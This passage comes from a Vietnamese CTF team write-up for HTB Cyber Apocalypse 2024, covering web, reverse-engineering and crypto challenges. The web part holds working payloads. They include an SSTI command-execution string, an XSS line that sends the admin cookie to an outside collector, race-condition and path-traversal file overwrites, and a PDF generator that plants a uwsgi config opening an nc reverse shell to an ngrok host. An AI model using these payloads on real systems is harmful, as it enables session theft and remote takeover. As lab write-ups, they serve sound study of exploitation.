2024-03-16 22:34:49 127.0.0.1 - - [16/Mar/2024 15:34:49] "GET /visit?productID=1&email=xclow3n@apexsurvive.htb&password=d8Bfk5Fw6oiROrxqrS2TmLc4NF1ZHU3r0OQfZSzbHna2DGljQbEmNG6st7uZ9QQ7 HTTP/1.1" 200 -

Exploit file upload
Nói đến upload file python thì cách đầu tiên mình nghĩ đến là upload ghi đè file __init__.py nhưng web này lại không có nên hướng đi đó không khả thi cho lắm
Vì mới gần đây có một bài upload python cũng na ná, teammate MacHongNam đã gợi ý mình cách ghi đè file html và ssti trong file đó để khi server render_template sẽ trigger ssti để RCE. Điều kiện là file templates đó chưa được render lần nào, vì render_template sẽ ghi nhớ các lần render nên nếu render lỗi khả năng phải chạy lại docker làm lại là rất cao
Mình sẽ chọn templates info.html được render ở path / để inject -> trang chủ giới thiệu, chỉ cần lúc đầu mình truy cập thẳng vào path /challenge và /email là được
@challengeInfo.route('/')
def info():
    return render_template('info.html')

File sau khi được upload sẽ lưu vào /tmp/temporaryUpload rồi mới được check, sau khi check thành công nội dung được đưa vào folder contracts hoặc là trả về thông báo invalid PDF.
\=> Phải mất 2 lần ghi file thì file mới được ghi thành công, mình hoàn toàn có thể lợi dụng lúc file pdf đang được check để upload 1 file html nữa thế chỗ file pdf cũ
\=> race condition, sau đó sử dụng path traversal ghi đè html là có thể rce thành công rồi
Mình bắt tay vào viết script upload file race condition nhưng bằng một lý do gì đấy mà script của mình đều ghi đè pdf vào templates thay vì file html mà mình mong muốn =))). Mình stuck ở đây cũng phải 2 tiếng trước khi quyết định méo dùng script python nữa mà chuyển qua xài Burp Repeater cho nó nhanh.
Server check pdf chặt nên mình sẽ gửi 1 pdf valid lấy mẫu request, và file html mình copy nguyên từ thằng gốc và nhét thêm dòng:
{% print(namespace.__init__.__globals__.os.popen('/readflag').read()) %}

Thay đổi tên file của các file html thành /app/application/templates/info.html, mình gửi đi cùng lúc 1 req upload pdf và 6 req upload html

Sau một hồi spam Ctrl Space thì mình đã ghi đè được file info.html

Khai thác thành công!!

Tuy rằng đã có thể khai thác thành công, nhưng mình vẫn chưa tìm được cách nào để có thể lên được admin, cùng lúc này teammate MacHongNam bảo mình hãy nghĩ cách để lên được isInternal nhằm sử dụng api /addItem, vì mình có thể dom based XSS tại endpoint /product/product-id
Bypass sanitized input to trigger XSS
Nghe như vậy thì mình đã tìm đến path addProduct để thêm sản phẩm, khi đọc đến product.html thì mình đã thấy vì sao có thể dom based XSS:


Note là một thuộc tính mà mình control khi addProduct -> sử dụng backtick escape khỏi đoạn khai báo note -> XSS:

Kết hợp với việc có thể report cho admin về các product, mình có payload sau để lấy session của admin:
`;fetch("https://9vja3pan.requestrepo.com/?"+document.cookie);//

Bypass isInternal with race condition
Tiếp tục vùi đầu vào đống source code, mình thấy được ở đoạn verifyEmail, email được tách ra thành tên và hostname, kiểu a@gmail.com thì tên là a và hostname là gmail.com. Nếu như hostname của mình là apexsurvive.htb thì database sẽ set isInternal="true", đây chính là chỗ mình cần phải exploit
def verifyEmail(token):
    user = query('SELECT * from users WHERE confirmToken = %s', (token, ), one=True)

    if user and user['isConfirmed'] == 'unverified':
        _, hostname = parseaddr(user['unconfirmedEmail'])[1].split('@', 1)

        if hostname == 'apexsurvive.htb':
            query('UPDATE users SET isConfirmed=%s, email=%s, unconfirmedEmail="", confirmToken="", isInternal="true" WHERE id=%s', ('verified', user['unconfirmedEmail'], user['id'],))
        else:
            query('UPDATE users SET isConfirmed=%s, email=%s, unconfirmedEmail="", confirmToken="" WHERE id=%s', ('verified', user['unconfirmedEmail'], user['id'],))

        mysql.connection.commit()
        return True

    return False

Ngặt nghèo ở chỗ là trang email của chúng ta chỉ nhận email gửi đến test@email.htb 😢. Sau khi bế's tắc một khoảng thời gian khá lâu thì teammate Chương tìm ra được cách để nhận được email của tài khoản có hostname apexsurvive.htb là race condition:

Khi chỉnh sửa profile từ một email đã verify thành một email khác, server sẽ tự gửi token đến email đó

@api.route('/profile', methods=['POST'])
    ...
    if result:
        if result == 'email changed':
            sendEmail(decodedToken.get('id'), email)
        return response('Profile updated!')


API sendVerification cho biết server sẽ lấy thông tin của user đó, kiểm tra xem user đã được confirm email chưa, nếu chưa sẽ gửi token đến email đó

@api.route('/sendVerification', methods=['GET'])
@isAuthenticated
@sanitizeInput
def sendVerification(decodedToken):
    user = getUser(decodedToken.get('id'))

    if user['isConfirmed'] == 'unverified':
        if checkEmail(user['unconfirmedEmail']):
            sendEmail(decodedToken.get('id'), user['unconfirmedEmail'])
            return response('Verification link sent!')
        else:
            return response('Invalid Email')

    return response('User already verified!')

-> Có thể race condition save profile 2 email, đồng thời sendVerification để yêu cầu gửi token đến email, từ đó ghi đè nội dung server gửi cho test@email.htb thành của test@apexsurvive.htb, từ đó lấy token của email test@apexsurvive.htb đi verify là được isInternal=true.
Complete the attack chain & Exploit
Các bước tấn công đã đầy đủ, nên mình sẽ tổng hợp lại như sau:

Race condition verify email -> bypass isInternal

Dom Based XSS tại /addProduct -> lấy session admin/ bypass admin

Race condition upload file -> RCE


Attack chain có tận 2 lần race condition nên việc có thể solve nhanh hay chậm nó phụ thuộc vào may mắn khá nhiều =)), sau khi rõ hướng thì mình deploy web rồi làm luôn và theo như mình thấy thì race verify email là công đoạn lâu nhất.

Bypass isInternal
  Mình tiếp tục sử dụng Burp Repeater để race condition email, với 3 req sendVerification, 1 req update profile test@email.htb và 1 req test@apexsurvive.htb:



Cuối cùng cũng có token có thể verify



Bypass admin
  Sử dụng payload bên trên và report product id, mình có admin token:




Đến giờ truy cập admin để RCE rồi


Upload file
  Mình làm y hệt như ở trên local và lụm được flag của challenge:



Flag
HTB{0H_c0m3_0n_r4c3_c0nd1t10n_4nd_C55_1nj3ct10n_15_F1R3}
P/s: Sau khi làm xong mình mới thấy là nếu như render ra pdf thì trang web sẽ bị lỗi và không lưu lại template đó nên mình có thể tiếp tục race mà không phải redeploy challenge.
Another workaround to bypass PDF upload
Sau khi đi tản mạn write up của mọi người, mình có tìm được bài write up này có một solution khác để trigger RCE thông qua upload file:
https://blog.elmosalamy.com/posts/apexsurvive-writeup-htb-cyber-apocalypse-2024/
Đây là một cách rất hay khi server uwsgi dính lỗi arbitary PDF upload, cụ thể là nhằm vào file uwgsi.ini (Chi tiết ở document): https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html

uwsgi có khả năng đọc file config của chính nó kể cả khi file dưới dạng binary, miễn sao nó tìm được chuỗi bắt đầu khai báo config hợp lệ: [uwsgi]

uwsgi sử dụng operator @ và các scheme để hỗ trợ include, đọc file và call các function, trong đó có scheme exec dùng để thực thi câu lệnh -> Thứ mình cần dùng:


    [uwsgi]
    ; read from a process stdout
    body = @(exec://whoami)

Việc tấn công vào file ini sẽ cần một yếu tố quan trọng khác: Làm thế nào để uwsgi reload lại config của chính nó?
Điều này có thể được giải quyết nếu như uwsgi config sẵn chức năng dùng để debug py-auto-reload, nếu như phát hiện sự thay đổi của các file trong server thì config sẽ được reload.
Việc upload file PDF là chưa đủ, nên sau đó mình cần phải ghi đè một file .py thì server mới reload lại config, từ đó trigger RCE.
  py-autoreload = 3

Document cũng có luôn cả POC nên mình sẽ sửa để đổi thành payload reverse shell:
from fpdf import FPDF
from exiftool import ExifToolHelper

with ExifToolHelper() as et:
    et.set_tags(
        ["lmao.jpg"],
        tags={"model": "
[uwsgi]
foo = @(exec://nc 0.tcp.ap.ngrok.io 18726 -e /bin/sh)
"},
        params=["-E", "-overwrite_original"]
    )
class MyFPDF(FPDF):
    pass

pdf = MyFPDF()

pdf.add_page()
pdf.image('./lmao.jpg')
pdf.output('exploit.pdf', 'F')

Lưu ý: Nếu báo lỗi không có module exiftool thì mình sẽ chạy câu lệnh
    python3 -m pip install -U pyexiftool

Sau khi gen ra PDF thì mình gửi đi để ghi đè /app/uwsgi.ini

Ghi đè tiếp /app/application/database.py để trigger uwgsi reload lại config

Log server thông báo việc file database.py đã bị thay đổi, tiến hành kill tiến trình và khởi động lại /app, load lại config

Reverse Shell thành công


Reverse Engineering
LootStash
credit: Trohan0x00
Cách nhanh nhất là shift + f12 và tìm format HTBđể lấy flag
Flag
HTB{n33dl3_1n_a_l00t_stack}
PackedAway
credit: Trohan0x00
Nhìn tên bài thì ta cũng biết bài này đã bị pack. Để chắc chắn hơn ta có thể dùng DIE hoặc file để check

File này đã bị pack vậy nên ta tiến hành unpack. Sau khi unpack cũng như bài trước ta sẽ search string để tìm thử format flag và ta thấy flag.
Flag
HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd}
BoxCutter
credit: Trohan0x00
Ta check main như sau:
int __fastcall main(int argc, const char **argv, const char **envp)
{
    char file[8]; // [rsp+0h] [rbp-20h] BYREF
    __int64 v5[2]; // [rsp+8h] [rbp-18h]
    int fd; // [rsp+18h] [rbp-8h]
    unsigned int i; // [rsp+1Ch] [rbp-4h]

    *(_QWORD *)file = 0x540345434C75637FLL;
    v5[0] = 0x68045F4368505906LL;
    *(__int64 *)((char *)v5 + 7) = 0x374A025B5B035468LL;
    for ( i = 0; i <= 0x16; ++i )
    {
        file[i] ^= 0x37u;
    }

    fd = open(file, 0);
    if ( fd > 0 )
    {
        puts("[*] Box Opened Successfully");
        close(fd);
    }
    else
    {
        puts("[X] Error: Box Not Found");
    }

    return 0;
}

Chương trình khá đơn giản ta chỉ cần chú ý vào vòng lặp for ( i = 0; i <= 0x16; ++i ) { file[i] ^= 0x37u; } chương trình sẽ xor từng kí tự trong file với 0x37u ta sẽ đặt breakpoint để lấy giá trị ra

Flag
HTB(tr4c1ng_th3_c4ll5})
CRUSHING
credit: Trohan0x00
Đề cho ta 1 file thực thi và 1 file data, check xem thử file data thế nào

Có lẽ đây là flag hoặc output gì đó của chương trình được enc và lưu ở đây, để rõ hơn thì mình sẽ phân tích file ELF kia

Quăng vào IDA thì thấy hàm main khá đơn giản, đập vào mình đầu tiên thì chương trình call hai hàm rất đáng nghi là add_char_to_map và serialize_and_output, input nhận từng kí tự hàm check sẽ dừng chương trình chỉ khi input = -1
Hàm add_char_to_map sẽ đưa từng kí tự input vào có lẽ để thực hiện ánh xạ vào structure nào đó, ta sẽ check thử

Hàm này về cơ bản là để check các byte value. Mỗi vị trí chứa một danh sách liên kết của phần đối số. Mỗi phần tử có một index trỏ đến vị trí của ký tự trong file data, ta check xem hàm thứ hai

Phần list_len tính xem danh sách liên kết của char dài bao nhiêu thì nó sẽ in ra, sau đó nó sẽ in phần index char, lặp 256 lần vì byte từ 0 đến 255.
import struct

def decrypt_message(file_path):
    with open(file_path, 'rb') as f:
        char_to_positions = {}

        for char in range(256):
            if len(f.read(8)) < 8:
                break

            f.seek(-8, 1)

            list_len = struct.unpack('Q', f.read(8))[0]

            positions = []
            for _ in range(list_len):
                if len(f.read(8)) < 8:
                    break

                f.seek(-8, 1)

                positions.append(struct.unpack('Q', f.read(8))[0])

            char_to_positions[char] = positions

        position_to_char = {pos: char for char, positions in char_to_positions.items() for pos in positions}

        decrypted_message = ''.join(chr(position_to_char[pos]) for pos in sorted(position_to_char))

    return decrypted_message

x = decrypt_message("message.txt.cz")
print(x)

Flag
HTB{4_v3ry_b4d_compr3ss1on_sch3m3}
FollowThePath
credit: Trohan0x00

Nhìn source code ban đầu sẽ không cho ta nhiều thông tin cho lắm, đơn giản chương trình sẽ yêu càu ta nhập flag và check input đầu vào.
Mình sẽ thử debug đặt breakpoint ở line 9

Đây là hàm check input đầu vào của chương trình. Đầu tiên r8 sẽ lưu giá trị từng kí tự đầu vào của chương trình sau đó xor r8, 0C4h và cmp r8, 8Ch. Mình nghĩ 2 const này sẽ đổi khi qua các hàm check khác cho từng kí tự khác vì thế để xor ngược lại tìm flag thì ta xor 8Ch, 0C4h ra được kí tự H.
Đây có lẽ là format HTB{ dựa theo format có sẵn ta sẽ spam thử input đầu vào HTV{aaaaaaaaaaa}
Trong lúc debug ta sẽ thấy các biến bên dưới sẽ tự sửa thành code theo như tìm hiểu mình biết được đó là cơ chế self modify

Khi chạy đến kí tự a đầu tiên ngoài format ta có thể patch giá trị r8 để qua hàm check hoặc set IP thằng để nhảy qua
Chall có thể làm theo cách thủ công như này nhưng nhiều lúc khá cay tại mình ấn nhầm f9 hoặc là đi quấ hàm check mà chưa kịp set IP nên nó jump vô r10:vvv
Flag
HTB{s3lF_d3CRYpt10N-1s_k1nd4_c00l_i5nt_1t}
QuickScan
credit: Trohan0x00
Chall cho ta sv docker khi truy cập ta sẽ được như sau

Đây có lẽ là một chuỗi b64 của file ELF mình quăng lên Cyber chef để decode thì ta được một đoạn code như sau

Đoạn decode cho ta 1 chương trình nhỏ, ta chỉ cần đọc được giá trị byte ở byte_80480C5 nhưng giới hạn thời gian bài cho ta chỉ 60s nên việc decode xong đọc giá trị là không thể nên ta sẽ dùng cách khác.
from pwn import *
import base64
def from_bytes(b):
    num = int.from_bytes(b, byteorder='little')
    if num >= (2 ** (len(b) * 8 - 1)):
        num -= (2 ** (len(b) * 8))
    return num

def find_sequence_and_extract_bytes(byte_sequence):
    sequence = bytes([0x48, 0x83, 0xEC, 0x18, 0x48, 0x8D, 0x35])

    data = byte_sequence

    index = data.find(sequence)

    if index == -1:
        print("Sequence not found in file.")
        return

    four_bytes = data[index + len(sequence) : index + len(sequence) + 4]

    b = from_bytes(four_bytes)

    s = index + 4 + 7 + b

    extracted_bytes = data[s : s + 24]

    return extracted_bytes.hex()

r = remote('94.237.62.195' 51062)


first_message = r.recvuntil("Bytes? ").decode()
print(first_message)

first_answer = first_message.split("Expected bytes: ")[1].split("\n")[0]


r.sendline(first_answer)

solved = 0

while solved < 128:

    try:
        second_message = r.recvuntil("Bytes? ").decode()
    except Exception as e:
        print("solve: ", solved)
        print("An error occurred: ", str(e))
        print("Received so far: ", r.recv().decode())

    print(second_message)

    elf_base64 = second_message.split("ELF:  ")[1].split("\n")[0]

    elf = base64.b64decode(elf_base64)
    answer = find_sequence_and_extract_bytes(elf)

    print(answer)

    r.sendline(answer)

    solved += 1
flag = r.recv().decode()
print(flag)

Chương trình này dùng 24 byte lưu trên stack và sau đó chép 24 byte (movsb rep) từ vị trí dữ liệu vào stack. Các level tiếp theo có cùng cấu trúc, chỉ khác là số byte và vị trí các data

Flag
HTB{y0u_4n4lyz3d_th3_p4tt3ns!}
FlecksOfGold
credit: Trohan0x00
Bài này mình cảm thấy hơi ao trình đối với mình, sau một lúc tìm hiểu thì cơ bản mình biết được chương trình được viết bằng ECS (Entity Component System). Cụ thể mình sẽ khái quát như sau

ECS là một kiến trúc phần mềm trong lĩnh vực phát triển trò chơi cũng có thể được áp dụng trong các ứng dụng khác như mô phỏng, thực tế ảo,…

ECS cấu tạo gồm 3 phần chính:

Entity: Đại diện cho một đối tượng trong trò chơi hoặc ứng dụng. Một thực thể không chứa bất kỳ dữ liệu nào, chỉ đơn giản là một "tên" hoặc "nhãn" để định danh cho các thành phần liên quan.

Component: Là các khối xây dựng dữ liệu đơn giản, chứa thông tin về các thuộc tính hoặc hành vi của đối tượng. Mỗi thành phần nên chỉ chứa một phần nhỏ và độc lập của thông tin cần thiết để mô tả một khía cạnh cụ thể của đối tượng.

System: Là các thành phần xử lý logic và hành vi của đối tượng. Hệ thống hoạt động bằng cách xử lý các thành phần tương ứng và thực hiện các thao tác như cập nhật, vẽ, va chạm và xử lý sự kiện cho các thực thể tương ứng.




Các thông tin khác có thể check tại đây.
Nhìn sơ qua, đề cho ta file ELF, tiến hành phân tích tĩnh bằng IDA

Nhìn hàm main thôi thì mình thấy ngán vl rồi :v, ta hãy phân tích từng phần

Đây có thể là khai báo một component gì đó với kích thước là 0x10

Nhìn vào đọan này ta có thể thấy được FlagPart được khai báo với 2 byte
zmm0_3, zmm1_1 = rand_pos.constprop.1()
int64_t* world_1 = world
void* rax_44 = ecs_new_w_id(world_1, 0)

Rand_pos được khởi tạo với vị trí ngẫu nhiên trong world sau đó call ecs_new_w_id để tạo ra một Entity mới và cấp phát ID cho nó sau đó gắn position ở trên đã khai báo vào sau đó trỏ tới FLagPart của chúng ta, các FlagPart sẽ được nằm rải rác ở khắp map.
Phần solve bài này mình sẽ update sau sau khi thật sự hiểu còn về phần tricks solve mình có tham khảo các anh nước ngoài đã solve trong discord khá hay.
Đầu tiên do FLECS có thể leak REST API để phân tích ECS, có thể truy cập thông qua giao diện người dùng tại https://www.flecs.dev/explorer/. Tính năng này bị vô hiệu hóa trong thử thách, nhưng có thể được kích hoạt bằng cách viết một library share để hook vào
#include 

#include "flecs.h"

const ecs_entity_t ecs_id(EcsRest) =                FLECS_HI_COMPONENT_ID + 118;
void (*ecs_set_id_ptr)(ecs_world_t*, ecs_entity_t, ecs_id_t, size_t, const void*); // dlsym can't access private symbols, we'll set the function pointer via GDB
void *do_hacks(ecs_world_t* world) {
    void (*ecs_set_id)(ecs_world_t*, ecs_entity_t, ecs_id_t, size_t, const void*) = ecs_set_id_ptr;
    ecs_singleton_set(world, EcsRest, {0});
}

Sau đó compile thành file .so bằng g++ -shared -o hack.so hack.cpp

Chờ và đợi nó compile sau khi đã compile thành công thì tạo một GDB scirpt như sau:
# Set the environment variable to preload your hack.so library
set environment LD_PRELOAD ./hack.so

# Run the program
run

# Wait for the program to hit a breakpoint or stop
# This is where you can interact with the program and obtain the ecs_world_t pointer

# Finish the current function to get the ecs_world_t pointer ($rax register)
finish

# Assign the value of $rax to $world
set $world = $rax

# Set the function pointer to ecs_set_id
set $ecs_set_id_ptr = &ecs_set_id

# Call the do_hacks function to enable EcsRest for this world
call (void)do_hacks($world)

# Continue executing the program
continue

Sau đó, chúng ta có thể truy cập vào trình duyệt, chứa danh sách Explorers và hiển thị thành phần CanMove. Ta gán CanMove vào Person Adrianne sau đó đợi flag sẽ được reveal trên terminal.
Ngoài ra còn một số cách khác có thể solve cho bài này như ta sẽ set breakpoint ở esc function và get các giá trị ở memory được trỏ đến ở [flag index, char] và chỉ cần sắp xếp lại để lấy flag.
Flag
HTB{br1ng_th3_p4rt5_t0g3th3r}
MetaGaming
credit: Trohan0x00
Bài cho ta luôn source code, cứ ngỡ sẽ dễ ăn nhưng không, source khá dài và rối nên ta phải đọc kỹ.
Mình bắt đầu đọc từ main trước

Ta có thể thầy flag format được khai báo từ dữ liệu trên có thể biết được độ dài flag là 40. Xuống bên dưới sẽ là hàm program_t đây là nợi để call các method được define ở bên trên
struct program_t {
    using R = std::array<uint32_t, 15>;

    template<insn_t Insn>
    static constexpr void execute_one(R ®s) {
        if constexpr (Insn.opcode == 0) {
            regs[Insn.op0] = Flag.at(Insn.op1);
        } else if constexpr (Insn.opcode == 1) {
            regs[Insn.op0] = Insn.op1;
        } else if constexpr (Insn.opcode == 2) {
            regs[Insn.op0] ^= Insn.op1;
        } else if constexpr (Insn.opcode == 3) {
            regs[Insn.op0] ^= regs[Insn.op1];
        } else if constexpr (Insn.opcode == 4) {
            regs[Insn.op0] |= Insn.op1;
        } else if constexpr (Insn.opcode == 5) {
            regs[Insn.op0] |= regs[Insn.op1];
        } else if constexpr (Insn.opcode == 6) {
            regs[Insn.op0] &= Insn.op1;
        } else if constexpr (Insn.opcode == 7) {
            regs[Insn.op0] &= regs[Insn.op1];
        } else if constexpr (Insn.opcode == 8) {
            regs[Insn.op0] += Insn.op1;
        } else if constexpr (Insn.opcode == 9) {
            regs[Insn.op0] += regs[Insn.op1];
        } else if constexpr (Insn.opcode == 10) {
            regs[Insn.op0] -= Insn.op1;
        } else if constexpr (Insn.opcode == 11) {
            regs[Insn.op0] -= regs[Insn.op1];
        } else if constexpr (Insn.opcode == 12) {
            regs[Insn.op0] *= Insn.op1;
        } else if constexpr (Insn.opcode == 13) {
            regs[Insn.op0] *= regs[Insn.op1];
        } else if constexpr (Insn.opcode == 14) {
            __noop;
        } else if constexpr (Insn.opcode == 15) {
            __noop;
            __noop;
        } else if constexpr (Insn.opcode == 16) {
            regs[Insn.op0] = rotr(regs[Insn.op0], Insn.op1);
        } else if constexpr (Insn.opcode == 17) {
            regs[Insn.op0] = rotr(regs[Insn.op0], regs[Insn.op1]);
        } else if constexpr (Insn.opcode == 18) {
            regs[Insn.op0] = rotl(regs[Insn.op0], Insn.op1);
        } else if constexpr (Insn.opcode == 19) {
            regs[Insn.op0] = rotl(regs[Insn.op0], regs[Insn.op1]);
        } else if constexpr (Insn.opcode == 20) {
            regs[Insn.op0] = regs[Insn.op1];
        } else if constexpr (Insn.opcode == 21) {
            regs[Insn.op0] = 0;
        } else if constexpr (Insn.opcode == 22) {
            regs[Insn.op0] >>= Insn.op1;
        } else if constexpr (Insn.opcode == 23) {
            regs[Insn.op0] >>= regs[Insn.op1];
        } else if constexpr (Insn.opcode == 24) {
            regs[Insn.op0] <<= Insn.op1;
        } else if constexpr (Insn.opcode == 25) {
            regs[Insn.op0] <<= regs[Insn.op1];
        } else {
            static_assert(always_false_insn_v);
        }
    }

Các method này đơn giản sẽ check các opcode trong thanh ghi xem có đúng giá trị như thế không nếu đúng thì sẽ thực hiện các phương thức trong scope ví dụ như method 0 là read flag, 1 = mov, 2 = xor,…
(program::registers[0] == 0x3ee88722 && program::registers[1] == 0xecbdbe2 && program::registers[2] == 0x60b843c4 && program::registers[3] == 0x5da67c7 && program::registers[4] == 0x171ef1e9 && program::registers[5] == 0x52d5b3f7 && program::registers[6] == 0x3ae718c0 && program::registers[7] == 0x8b4aacc2 && program::registers[8] == 0xe5cf78dd && program::registers[9] == 0x4a848edf && program::registers[10] == 0x8f && program::registers[11] == 0x4180000 && program::registers[12] == 0x0 && program::registers[13] == 0xd && program::registers[14] == 0x0

Tổng cộng có 15 thanh ghi từ 0-14 và mỗi thanh ghi sẽ giữ một giá trị đến khi return chương trình, mình đoán các giá trị thanh ghi có sẽ lần lượt là các kí tự của flag
Tóm lại cơ chế của mã là pack 4 ký tự flag trong một thanh ghi, thực hiện +-*^ với giá trị của thanh ghi tiếp theo. Quá trình này hoàn toàn giống nhau đối với mọi thanh ghi (ngoại trừ các thanh ghi cuối cùng). Nhưng do các thanh ghi phụ thuộc với nhau nên ta phải làm ngược lại
regs[14] <<= 8
regs[14] = flag[38]
regs[14] <<= 16
regs[14] = flag[39]
regs[14] <<= 24
regs[14] = 0
regs[13] = ror(regs[13], 10)
regs[11] += 13
regs[11] = ror(regs[11], 13)
regs[12] &= 12
regs[12] -= 12
regs[13] = rol(regs[13], regs[12])
regs[13] -= regs[11]
regs[13] = 13
regs[13] = flag[13]
regs[13] = regs[11]
regs[12] |= regs[10]
regs[12] = 0
regs[10] |= 12
regs[10] = rol(regs[10], 13)
regs[10] ^= regs[13]
regs[11] &= regs[10]
regs[11] = rol(regs[11], regs[12])
regs[11] = flag[12]
regs[11] += 13
regs[11] = ror(regs[11], 13)
regs[11] &= regs[11]

Nhìn vào flow từ 14 - 11, thì nhìn vào flow của thanh ghi thứ 11 ta có thể ror ngược lại dễ dàng để lấy được flag[12] = 'v'
regs[10] = regs[11]
regs[10] = rol(regs[10], 13)
regs[10] |= 12

Tiếp đến là thanh ghi thứ 10 ta cũng có thể lấy được giá trị thanh ghi này, kể từ đây các thanh ghi từ 9 - 0 sẽ thực hiện các phép toán ±*^ tương tự nhau nên ta có thể viết script để lấy giá trị
#include 
#include 

int main()
{
    for (int i = 0; i < 255; ++i)
    {
        for (int j = 0; j < 255; ++j)
        {
            for (int k = 0; k < 255; ++k)
            {
                for (int l = 0; l < 255; ++l)
                {
                    uint32_t reg = (l << 24) | (k << 16) | (j << 8) | i;

                    reg -= 532704100,
                    reg -= 2519542932;
                    reg ^= 2451309277;
                    reg ^= 3957445476;
                    reg += 2583554449;
                    reg -= 1149665327;
                    reg += 3053959226;
                    reg += 3693780276;
                    reg ^= 609918789;
                    reg ^= 2778221635;
                    reg += 3133754553;
                    reg += 3961507338;
                    reg ^= 1829237263;
                    reg ^= 2472519933;
                    reg += 4061630846;
                    reg -= 1181684786;
                    reg -= 390349075;
                    reg += 2883917626;
                    reg -= 3733394420;
                    reg ^= 3895283827;
                    reg ^= 2257053750;
                    reg -= 2770821931;
                    reg ^= 477834410;

                    reg = reg ^ 0x8f;

                    if (reg == 0x4a848edf )
                    {
                        printf("%c%c%c%c", i, j, k, l);
                        break;
                    }
                }
            }
        }
    }
}

Chạy script ta sẽ được 4 char là 4 char cuối của flag 7b0} Tương tự còn lại với các thanh ghi từ 8 - 0
Flag
HTB{m4n_1_l0v4_cXX_TeMpl4t35_9fb60c17b0}

Crypto
Note: Write này được tổng hợp từ team crypto của KCSC! Với sự đóng của Zupp, Giang, Minh
Makeshift
credit: Zupp
Description

Source:

from secret import FLAG

flag = FLAG[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)


Output:

!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB

Solution
Đây là một chall khá dễ và hầu như mình không cần suy nghĩ nhiều, chỉ cần phân tích source và viết công thức ra là được. Có được:
msg = flag[1] + flag[2] + flag[0] + flag[4] + flag[5] + flag[3] + ...

Các vị trí sẽ so le nhau và chỉ cần sắp xếp lại là ta có được flag:
msg = "!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB"
flag = ''

for i in range(0, len(msg), 3):
    flag += msg[i+2]
    flag += msg[i]
    flag += msg[i+1]

print(flag[::-1])

Flag
HTB{4_b3tTeR_w3apOn_i5_n3edeD!?!}
Dynastic
credit: Giang

Source:

from secret import FLAG
from random import randint

def to_identity_map(a):
    return ord(a) - 0x41

def from_identity_map(a):
    return chr(a % 26 + 0x41)

def encrypt(m):
    c = ''
    for i in range(len(m)):
        ch = m[i]
        if not ch.isalpha():
            ech = ch
        else:
            chi = to_identity_map(ch)
            ech = from_identity_map(chi + i)
        c += ech
    return c

with open('output.txt', 'w') as f:
    f.write('Make sure you wrap the decrypted text with the HTB flag format :-]\n')
    f.write(encrypt(FLAG))


Output:

Make sure you wrap the decrypted text with the HTB flag format :-] DJF_CTA_SWYH_NPDKK_MBZ_QPHTIGPMZY_KRZSQE?!_ZL_CN_PGLIMCU_YU_KJODME_RYGZXL

Vì nó không shift 1 giá trị cố định mà mỗi kí tự của plaintext được shift theo quy luật nhất định (cộng thêm cả vị trí index của kí tự đó trong plaintext nữa).

Dựa vào hàm trên mình chỉ cần dịch ngược lại là xong

Script:

from pkcs1 import emsa_pkcs1_v15
from Crypto.Util.number import *
from pwn import *
from gmpy2 import *
from sympy.ntheory.residue_ntheory import discrete_log
from Crypto.Util.Padding import pad, unpad
from os import urandom
import math
from pwn import *
import base64 
from tqdm import tqdm
from Crypto.Cipher import AES
import os
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from hashlib import sha256
from Crypto.Hash import SHA256

def to_identity_map(a):
    return ord(a) - 0x41

def from_identity_map(a):
    return chr(a % 26 + 0x41)

def encrypt(m):
    c = ''
    for i in range(len(m)):
        ch = m[i]
        if not ch.isalpha():
            ech = ch
        else:
            chi = to_identity_map(ch)
            ech = from_identity_map(chi + i)
        c += ech
    return c


def decrypt(ct):
    c = ''
    for i in range(len(ct)):
        ch = ct[i]
        if not ch.isalpha():
            res = ch
        else:
            ech = to_identity_map(chr(ord(ch)-i))
            chi = from_identity_map(ech)
            res = chi
        c += res
    return c



pl = "DJF_CTA_SWYH_NPDKK_MBZ_QPHTIGPMZY_KRZSQE?!_ZL_CN_PGLIMCU_YU_KJODME_RYGZXL"
print("HTB{"+decrypt(pl)+"}")

Flag
HTB{DID_YOU_KNOW_ABOUT_THE_TRITHEMIUS_CIPHER?!_IT_IS_SIMILAR_TO_CAESAR_CIPHER}
Primary Knowledge
credit: Zupp
Description

Source:

import math
from Crypto.Util.number import getPrime, bytes_to_long
from secret import FLAG

m = bytes_to_long(FLAG)

n = math.prod([getPrime(1024) for _ in range(2**0)])
e = 0x10001
c = pow(m, e, n)

with open('output.txt', 'w') as f:
    f.write(f'{n = }\n')
    f.write(f'{e = }\n')
    f.write(f'{c = }\n')


Output:

n = 144595784022187052238125262458232959109987136704231245881870735843030914418780422519197073054193003090872912033596512666042758783502695953159051463566278382720140120749528617388336646147072604310690631290350467553484062369903150007357049541933018919332888376075574412714397536728967816658337874664379646535347
e = 65537
c = 15114190905253542247495696649766224943647565245575793033722173362381895081574269185793855569028304967185492350704248662115269163914175084627211079781200695659317523835901228170250632843476020488370822347715086086989906717932813405479321939826364601353394090531331666739056025477042690259429336665430591623215

Solution
Trước tiên đọc source mình biết được n là một số nguyên tố lỏ 1024 bits, tới đây thì mình vác đi giải luôn. Đơn giản vì khi n là số nguyên tố, phi hàm Euler fn của n sẽ chính bằng n-1, lí do tại sao thì hướng dẫn sử dụng phi hàm Euler đã có (dùng để đếm số các số co-prime với một số cho trước).
Tới code luôn thôi vì ai cũng biết tính d bằng cách nào:
from Crypto.Util.number import *

n = 144595784022187052238125262458232959109987136704231245881870735843030914418780422519197073054193003090872912033596512666042758783502695953159051463566278382720140120749528617388336646147072604310690631290350467553484062369903150007357049541933018919332888376075574412714397536728967816658337874664379646535347
e = 65537
c = 15114190905253542247495696649766224943647565245575793033722173362381895081574269185793855569028304967185492350704248662115269163914175084627211079781200695659317523835901228170250632843476020488370822347715086086989906717932813405479321939826364601353394090531331666739056025477042690259429336665430591623215

d = inverse(e, n-1)
flag = long_to_bytes(pow(c, d, n)).decode()
print(flag)

Flag
HTB{0h_d4mn_4ny7h1ng_r41s3d_t0_0_1s_1!!!}
Blunt
credit: Zupp
Description

Source:

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import getPrime, long_to_bytes
from hashlib import sha256

from secret import FLAG

import random


p = getPrime(32)
print(f'p = 0x{p:x}')

g = random.randint(1, p-1)
